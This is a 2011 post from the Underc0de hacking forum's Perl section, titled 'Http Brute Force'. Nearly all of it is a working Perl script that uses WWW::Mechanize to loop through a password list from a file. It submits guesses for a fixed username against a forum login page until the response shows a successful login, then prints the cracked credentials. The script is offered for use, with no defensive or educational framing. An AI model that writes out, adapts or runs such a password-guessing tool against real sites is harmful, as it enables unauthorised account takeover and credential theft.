Underc0de

ProgramaciĆ³n Scripting => Perl => Topic started by: @ed33x on January 27, 2011, 08:45:35 pm

Title: Http Brute Force
Post by: @ed33x on January 27, 2011, 08:45:35 pm
Code: (perl) You are not allowed to view links. Register or Login
!/usr/bin/perl

use Carp;

use WWW::Mechanize;

#open pwlist
open INPUT, "file.txt";
my $pw = 0;
@lines = <INPUT>;
close INPUT;

my $webaddress = 'http://www.target.com/forums/login.php';

my $username = 'zondoz';

my $mech = WWW::Mechanize->new(

    cookie_jar      => {},
);

login:

my $password = @lines[$pw];

my $response = $mech->get($webaddress);

if (!$response->is_success) {

    die "Login page unreachable $webaddress: ",  $response->status_line, "\n";

}


# Login

$mech->field('username', $username);

$mech->field('password', $password);

my $response = $mech->click();

if ($response->is_success) {

    goto checkpw;

} else {

    die "Login failed: ",  $response->status_line, "\n";

}

1;
checkpw:
if($mech->content( format => 'text' ) =~ m/You last visited/i){
print "++++++++++++++++++++\n";
print "LOGIN SUCCESSFUL!\n";
print "USERNAME: $username\n";
print "PASSWORD: $password\n";
print "++++++++++++++++++++\n";
} else {
print "trying $username:$password attempts:$pw\n";
$pw ++;
goto login;
}